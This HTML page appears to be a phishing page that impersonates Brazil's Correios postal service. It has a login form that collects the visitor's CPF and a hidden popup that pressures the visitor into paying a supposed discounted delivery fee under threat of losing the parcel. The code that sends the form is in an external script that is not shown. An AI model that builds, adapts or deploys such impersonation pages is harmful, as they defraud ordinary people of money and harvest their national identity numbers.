<html lang="pt-BR"><head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>Correios - Login e Rastreamento</title>
    
    


    
    
<style>body{font-size:100%;}</style><style>/*! CSS Used from: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css */
.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1;}
.fa-box:before{content:"\f466";}
.fa-chevron-left:before{content:"\f053";}
.fa-dollar-sign:before{content:"\f155";}
.fa-envelope:before{content:"\f0e0";}
.fa-exclamation-circle:before{content:"\f06a";}
.fa-print:before{content:"\f02f";}
.fa-truck:before{content:"\f0d1";}
.fas{font-family:"Font Awesome 5 Free";}
.fas{font-weight:900;}
/*! CSS Used from: Embedded */
.pulse{animation:pulse-animation 2s infinite;}
body{font-family:'Trebuchet MS', sans-serif;}
.header-fixed{position:fixed;top:30px;width:100%;z-index:1000;background-color:white;}
.content{margin-top:40px;display:flex;flex-direction:column;min-height:calc(35vh - 140px);}
.main-content{margin-top:60px;flex:1;display:flex;align-items:center;justify-content:center;min-height:200px;margin-bottom:-100pxpx;}
.top-bar{position:fixed;top:0;left:0;width:100%;height:35px;background-color:#ffefb2;z-index:2000;display:flex;align-items:center;padding:0 10px;justify-content:space-between;}
.top-bar span{color:#E02424;font-weight:bold;cursor:pointer;display:flex;align-items:center;}
.top-bar span:hover{text-decoration:underline;}
.popup{position:fixed;top:0;left:0;width:100%;height:100%;background-color:rgba(0, 0, 0, 0.5);display:flex;align-items:center;justify-content:center;z-index:3000;}
.popup-content{background-color:white;padding:20px;border-radius:10px;box-shadow:0 5px 15px rgba(0, 0, 0, 0.3);max-width:400px;text-align:center;animation:fadeIn 0.3s ease-in-out;}
.popup-header{font-size:1.5rem;font-weight:bold;margin-bottom:1rem;color:#00416B;}
.popup-message{margin-bottom:1rem;font-size:1rem;color:#333;}
.popup-button{display:inline-block;margin:10px;padding:10px 20px;border-radius:5px;font-weight:bold;cursor:pointer;transition:background-color 0.3s ease;}
.popup-button-accept{background-color:#28a745;color:white;}
.popup-button-accept:hover{background-color:#218838;}
.popup-button-decline{background-color:#dc3545;color:white;}
.popup-button-decline:hover{background-color:#c82333;}
/*! CSS Used from: Embedded */
*,::before,::after{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-scroll-snap-strictness:proximity;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgb(59 130 246 / 0.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;}
*,::after,::before{box-sizing:border-box;border-width:0;border-style:solid;border-color:#e5e7eb;}
::after,::before{--tw-content:'';}
html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;tab-size:4;font-family:ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";font-feature-settings:normal;font-variation-settings:normal;-webkit-tap-highlight-color:transparent;}
body{margin:0;line-height:inherit;}
h1,h2{font-size:inherit;font-weight:inherit;}
a{color:inherit;text-decoration:inherit;}
strong{font-weight:bolder;}
button,input{font-family:inherit;font-feature-settings:inherit;font-variation-settings:inherit;font-size:100%;font-weight:inherit;line-height:inherit;letter-spacing:inherit;color:inherit;margin:0;padding:0;}
button{text-transform:none;}
button{-webkit-appearance:button;background-color:transparent;background-image:none;}
h1,h2,p{margin:0;}
ul{list-style:none;margin:0;padding:0;}
input::placeholder{opacity:1;color:#9ca3af;}
button{cursor:pointer;}
:disabled{cursor:default;}
img{display:block;vertical-align:middle;}
img{max-width:100%;height:auto;}
.absolute{position:absolute;}
.relative{position:relative;}
.left-4{left:1rem;}
.top-8{top:2rem;}
.-z-10{z-index:-10;}
.z-10{z-index:10;}
.mx-auto{margin-left:auto;margin-right:auto;}
.mb-2{margin-bottom:0.5rem;}
.mb-4{margin-bottom:1rem;}
.mb-6{margin-bottom:1.5rem;}
.mb-8{margin-bottom:2rem;}
.ml-4{margin-left:1rem;}
.mr-2{margin-right:0.5rem;}
.mt-2{margin-top:0.5rem;}
.mt-4{margin-top:1rem;}
.mt-6{margin-top:1.5rem;}
.mt-8{margin-top:2rem;}
.block{display:block;}
.flex{display:flex;}
.grid{display:grid;}
.hidden{display:none;}
.h-10{height:2.5rem;}
.h-16{height:4rem;}
.h-8{height:2rem;}
.h-auto{height:auto;}
.min-h-screen{min-height:100vh;}
.w-0\.5{width:0.125rem;}
.w-10{width:2.5rem;}
.w-16{width:4rem;}
.w-8{width:2rem;}
.w-auto{width:auto;}
.w-full{width:100%;}
.max-w-2xl{max-width:42rem;}
.max-w-6xl{max-width:72rem;}
.max-w-md{max-width:28rem;}
.flex-shrink-0{flex-shrink:0;}
.animate-spin{animation:spin 1s linear infinite;}
.grid-cols-1{grid-template-columns:repeat(1, minmax(0, 1fr));}
.items-start{align-items:flex-start;}
.items-center{align-items:center;}
.justify-center{justify-content:center;}
.justify-between{justify-content:space-between;}
.gap-8{gap:2rem;}
.space-y-2 > :not([hidden]) ~ :not([hidden]){--tw-space-y-reverse:0;margin-top:calc(0.5rem * calc(1 - var(--tw-space-y-reverse)));margin-bottom:calc(0.5rem * var(--tw-space-y-reverse));}
.space-y-6 > :not([hidden]) ~ :not([hidden]){--tw-space-y-reverse:0;margin-top:calc(1.5rem * calc(1 - var(--tw-space-y-reverse)));margin-bottom:calc(1.5rem * var(--tw-space-y-reverse));}
.overflow-hidden{overflow:hidden;}
.rounded{border-radius:0.25rem;}
.rounded-full{border-radius:9999px;}
.rounded-lg{border-radius:0.5rem;}
.border{border-width:1px;}
.border-b{border-bottom-width:1px;}
.border-l-4{border-left-width:4px;}
.border-t{border-top-width:1px;}
.border-t-4{border-top-width:4px;}
.border-solid{border-style:solid;}
.border-correios-blue{--tw-border-opacity:1;border-color:rgb(0 51 153 / var(--tw-border-opacity));}
.border-correios-footer-text{--tw-border-opacity:1;border-color:rgb(0 49 87 / var(--tw-border-opacity));}
.border-gray-200{--tw-border-opacity:1;border-color:rgb(229 231 235 / var(--tw-border-opacity));}
.border-gray-300{--tw-border-opacity:1;border-color:rgb(209 213 219 / var(--tw-border-opacity));}
.border-orange-500{--tw-border-opacity:1;border-color:rgb(249 115 22 / var(--tw-border-opacity));}
.bg-blue-600{--tw-bg-opacity:1;background-color:rgb(37 99 235 / var(--tw-bg-opacity));}
.bg-correios-button{--tw-bg-opacity:1;background-color:rgb(27 115 232 / var(--tw-bg-opacity));}
.bg-correios-navbar{--tw-bg-opacity:1;background-color:rgb(245 243 240 / var(--tw-bg-opacity));}
.bg-correios-yellow{--tw-bg-opacity:1;background-color:rgb(255 230 2 / var(--tw-bg-opacity));}
.bg-gray-100{--tw-bg-opacity:1;background-color:rgb(243 244 246 / var(--tw-bg-opacity));}
.bg-gray-200{--tw-bg-opacity:1;background-color:rgb(229 231 235 / var(--tw-bg-opacity));}
.bg-orange-100{--tw-bg-opacity:1;background-color:rgb(255 237 213 / var(--tw-bg-opacity));}
.bg-white{--tw-bg-opacity:1;background-color:rgb(255 255 255 / var(--tw-bg-opacity));}
.bg-yellow-500{--tw-bg-opacity:1;background-color:rgb(234 179 8 / var(--tw-bg-opacity));}
.p-4{padding:1rem;}
.p-8{padding:2rem;}
.px-3{padding-left:0.75rem;padding-right:0.75rem;}
.px-4{padding-left:1rem;padding-right:1rem;}
.px-6{padding-left:1.5rem;padding-right:1.5rem;}
.py-1{padding-top:0.25rem;padding-bottom:0.25rem;}
.py-12{padding-top:3rem;padding-bottom:3rem;}
.py-2{padding-top:0.5rem;padding-bottom:0.5rem;}
.pt-8{padding-top:2rem;}
.text-left{text-align:left;}
.text-center{text-align:center;}
.font-trebuchet{font-family:"Trebuchet MS", sans-serif;}
.text-2xl{font-size:1.5rem;line-height:2rem;}
.text-lg{font-size:1.125rem;line-height:1.75rem;}
.text-sm{font-size:0.875rem;line-height:1.25rem;}
.text-xl{font-size:1.25rem;line-height:1.75rem;}
.text-xs{font-size:0.75rem;line-height:1rem;}
.font-bold{font-weight:700;}
.font-normal{font-weight:400;}
.font-semibold{font-weight:600;}
.text-\[\#2563EB\]{--tw-text-opacity:1;color:rgb(37 99 235 / var(--tw-text-opacity));}
.text-blue-600{--tw-text-opacity:1;color:rgb(37 99 235 / var(--tw-text-opacity));}
.text-correios-blue{--tw-text-opacity:1;color:rgb(0 51 153 / var(--tw-text-opacity));}
.text-correios-footer-text{--tw-text-opacity:1;color:rgb(0 49 87 / var(--tw-text-opacity));}
.text-correios-menu-icon{--tw-text-opacity:1;color:rgb(0 113 173 / var(--tw-text-opacity));}
.text-correios-text{--tw-text-opacity:1;color:rgb(0 65 107 / var(--tw-text-opacity));}
.text-gray-500{--tw-text-opacity:1;color:rgb(107 114 128 / var(--tw-text-opacity));}
.text-gray-600{--tw-text-opacity:1;color:rgb(75 85 99 / var(--tw-text-opacity));}
.text-gray-700{--tw-text-opacity:1;color:rgb(55 65 81 / var(--tw-text-opacity));}
.text-gray-800{--tw-text-opacity:1;color:rgb(31 41 55 / var(--tw-text-opacity));}
.text-orange-500{--tw-text-opacity:1;color:rgb(249 115 22 / var(--tw-text-opacity));}
.text-orange-700{--tw-text-opacity:1;color:rgb(194 65 12 / var(--tw-text-opacity));}
.text-red-600{--tw-text-opacity:1;color:rgb(220 38 38 / var(--tw-text-opacity));}
.text-white{--tw-text-opacity:1;color:rgb(255 255 255 / var(--tw-text-opacity));}
.text-yellow-500{--tw-text-opacity:1;color:rgb(234 179 8 / var(--tw-text-opacity));}
.shadow{--tw-shadow:0 1px 3px 0 rgb(0 0 0 / 0.1), 0 1px 2px -1px rgb(0 0 0 / 0.1);--tw-shadow-colored:0 1px 3px 0 var(--tw-shadow-color), 0 1px 2px -1px var(--tw-shadow-color);box-shadow:var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow);}
.shadow-lg{--tw-shadow:0 10px 15px -3px rgb(0 0 0 / 0.1), 0 4px 6px -4px rgb(0 0 0 / 0.1);--tw-shadow-colored:0 10px 15px -3px var(--tw-shadow-color), 0 4px 6px -4px var(--tw-shadow-color);box-shadow:var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow);}
.shadow-md{--tw-shadow:0 4px 6px -1px rgb(0 0 0 / 0.1), 0 2px 4px -2px rgb(0 0 0 / 0.1);--tw-shadow-colored:0 4px 6px -1px var(--tw-shadow-color), 0 2px 4px -2px var(--tw-shadow-color);box-shadow:var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow);}
.transition{transition-property:color, background-color, border-color, fill, stroke, opacity, box-shadow, transform, filter, -webkit-text-decoration-color, -webkit-backdrop-filter;transition-property:color, background-color, border-color, text-decoration-color, fill, stroke, opacity, box-shadow, transform, filter, backdrop-filter;transition-property:color, background-color, border-color, text-decoration-color, fill, stroke, opacity, box-shadow, transform, filter, backdrop-filter, -webkit-text-decoration-color, -webkit-backdrop-filter;transition-timing-function:cubic-bezier(0.4, 0, 0.2, 1);transition-duration:150ms;}
.duration-300{transition-duration:300ms;}
.hover\:bg-blue-700:hover{--tw-bg-opacity:1;background-color:rgb(29 78 216 / var(--tw-bg-opacity));}
.hover\:underline:hover{-webkit-text-decoration-line:underline;text-decoration-line:underline;}
.focus\:outline-none:focus{outline:2px solid transparent;outline-offset:2px;}
.focus\:ring-2:focus{--tw-ring-offset-shadow:var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color);--tw-ring-shadow:var(--tw-ring-inset) 0 0 0 calc(2px + var(--tw-ring-offset-width)) var(--tw-ring-color);box-shadow:var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000);}
.focus\:ring-correios-blue:focus{--tw-ring-opacity:1;--tw-ring-color:rgb(0 51 153 / var(--tw-ring-opacity));}
@media (min-width: 640px){
.sm\:px-6{padding-left:1.5rem;padding-right:1.5rem;}
}
@media (min-width: 768px){
.md\:w-96{width:24rem;}
.md\:grid-cols-3{grid-template-columns:repeat(3, minmax(0, 1fr));}
}
@media (min-width: 1024px){
.lg\:px-8{padding-left:2rem;padding-right:2rem;}
}
/*! CSS Used keyframes */
@keyframes pulse-animation{0%{transform:scale(1);}50%{transform:scale(1.05);}100%{transform:scale(1);}}
@keyframes fadeIn{from{opacity:0;transform:scale(0.95);}to{opacity:1;transform:scale(1);}}
@keyframes spin{to{transform:rotate(360deg);}}
/*! CSS Used fontfaces */
@font-face{font-family:"Font Awesome 5 Free";font-style:normal;font-weight:400;font-display:block;src:url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.eot);src:url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.eot?#iefix) format("embedded-opentype"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.woff2) format("woff2"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.woff) format("woff"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.ttf) format("truetype"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-regular-400.svg#fontawesome) format("svg");}
@font-face{font-family:"Font Awesome 5 Free";font-style:normal;font-weight:900;font-display:block;src:url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.eot);src:url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.eot?#iefix) format("embedded-opentype"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff2) format("woff2"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.woff) format("woff"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.ttf) format("truetype"),url(https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/webfonts/fa-solid-900.svg#fontawesome) format("svg");}</style></head>

<script type="module">
    import { Spinner } from 'https://cdnjs.cloudflare.com/ajax/libs/spin.js/4.1.0/spin.min.js';

    window.Spinner = Spinner; // Torna Spinner acessível globalmente
</script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/spin.js/4.1.0/spin.min.css"/>


<body class="bg-gray-100 font-trebuchet">

<style>
    #loadingOverlay {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5); /* Fundo semitransparente */
        display: flex;
        align-items: center;
        justify-content: center;
        z-index: 9999; /* Garantir que fique sobre todos os outros elementos */
    }

    #loadingSpinner {
        /* O Spinner será inserido dinamicamente */
    }
</style>

<div id="loadingOverlay" style="display: none;">
    <div id="loadingSpinner"></div>
</div>

    <div class="top-bar" style="display: none;">
        <span>
            <i class=""></i>
        </span>
    </div>
    <header class="bg-correios-navbar border-b border-gray-200 p-4 shadow-md header-fixed">
        <div class="max-w-6xl mx-auto flex justify-between items-center">
            <button class="text-correios-menu-icon">
                <img src="/ect/img/menu.svg" alt="Menu" class="w-10 h-10">
            </button>
            <img alt="Correios logo" class="h-auto w-auto" src="/images/logo-correios-2048-1.png" style="max-height: 40px; max-width: 200px;">
            <div class="w-10"></div>
        </div>
    </header>

    <div class="content">
        <div id="loginPage" class="main-content">
            <main class="max-w-md mx-auto bg-white shadow-lg rounded-lg overflow-hidden">
                <div class="p-8">
                    <br>
                    <br>
                    <h1 class="text-xl font-bold mb-6 text-correios-text text-center">
                        Digite seu CPF para acessar sua conta
                    </h1>
                    <form id="fm1">
                        <div class="mb-6">
                            <label class="block text-sm font-bold text-gray-700 mb-2" for="username">
                                CPF
                            </label>
                            <input class="w-full border border-gray-300 rounded px-3 py-2 focus:outline-none focus:ring-2 focus:ring-correios-blue" id="username" name="username" type="tel" inputmode="numeric" pattern="\d{3}\.\d{3}\.\d{3}-\d{2}" maxlength="14" required="">
                        </div>
                        <button class="w-full bg-correios-button text-white py-2 rounded font-bold hover:bg-blue-700 transition duration-300" type="button" onclick="submitForm()">
                            ENTRAR
                        </button>
                    </form>
                    <div class="mt-4 text-center">
                        <a class="text-correios-blue text-sm font-bold hover:underline" href="#">
                            Esqueci minha senha
                        </a>
                    </div>
                    <p class="mt-6 text-sm text-gray-600 text-center">
                        Por razões de segurança, por favor clique em Sair e feche o seu navegador quando terminar de acessar os serviços que precisam de autenticação!
                    </p>
                </div>
            </main>
        </div>

    </div>

    <footer class="bg-correios-yellow">
        <div class="max-w-6xl mx-auto py-12 px-4 sm:px-6 lg:px-8">
            <div class="grid grid-cols-1 md:grid-cols-3 gap-8">
                <div>
                    <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">
                        Fale Conosco
                    </h2>
                    <ul class="text-correios-footer-text space-y-2">
                        <li>Registro de manifestações</li>
                        <li>Acompanhamento de manifestações</li>
                        <li>Central de Atendimento</li>
                        <li>Atendimento Comercial</li>
                        <li>Ouvidoria</li>
                        <li>Denúncia</li>
                    </ul>
                </div>
                <div>
                    <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">
                        Sobre os Correios
                    </h2>
                    <ul class="text-correios-footer-text space-y-2">
                        <li>Educação e Cultura</li>
                        <li>Código de Ética</li>
                        <li>Venda de Imóveis</li>
                    </ul>
                </div>
                <div>
                    <h2 class="text-2xl font-bold mb-4 text-correios-footer-text">
                        Outros Sites
                    </h2>
                    <ul class="text-correios-footer-text space-y-2">
                        <li>Loja online dos Correios</li>
                        <li>Ministério da Ciência, Tecnologia, Inovações e Comunicações</li>
                    </ul>
                </div>
            </div>
            <div class="mt-8 border-t border-correios-footer-text pt-8 text-center">
                <p class="text-sm text-correios-footer-text">
                    © Copyright 2024 Correios - Todos os direitos reservados
                </p>
                <p class="text-xs text-correios-footer-text mt-2">
                    v0.21.27
                </p>
            </div>
        </div>
    </footer>

    <div id="popup" class="hidden popup">
        <div class="popup-content">
            <h2 class="popup-header">Renegociação Aceita</h2>
            <p id="popupMessage" class="popup-message">A taxa vai abaixar 50% se você realizar o pagamento agora. Última chance de receber este pedido.</p>
            <div>
                <span id="acceptButton" class="popup-button popup-button-accept">Aceitar Oferta</span>
                <span id="declineButton" class="popup-button popup-button-decline">Perder o direito de receber</span>
            </div>
        </div>
    </div>

<script>
    var prefix_ = "{{prefix}}"
</script>
<script src="/ect/js/menu.js"></script>
<script src="/js/cpf.js"></script>
<script type="text/javascript" src="/webjars/jquery/3.6.1/jquery.min.js"></script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.getElementById('fm1');

        // Prevenir envio padrão ao pressionar Enter
        form.addEventListener('keydown', function(event) {
            if (event.key === 'Enter') {
                event.preventDefault(); // Impede o envio do formulário
                submitForm(); // Chama a função personalizada
            }
        });

        const cpfInput = document.getElementById('username');

        // Função para formatar CPF
        function formatCPF(cpf) {
            return cpf
                .replace(/\D/g, '') // Remove caracteres não numéricos
                .substring(0, 11) // Limita a 11 dígitos numéricos
                .replace(/(\d{3})(\d)/, '$1.$2') // Insere o primeiro ponto
                .replace(/(\d{3})(\d)/, '$1.$2') // Insere o segundo ponto
                .replace(/(\d{3})(\d{1,2})$/, '$1-$2'); // Insere o hífen
        }

        // Evento de input para formatar e validar o CPF
        cpfInput.addEventListener('input', function() {
            let cpf = cpfInput.value;

            // Formatar CPF com limite
            cpfInput.value = formatCPF(cpf);
        });
    });
</script>



</body></html>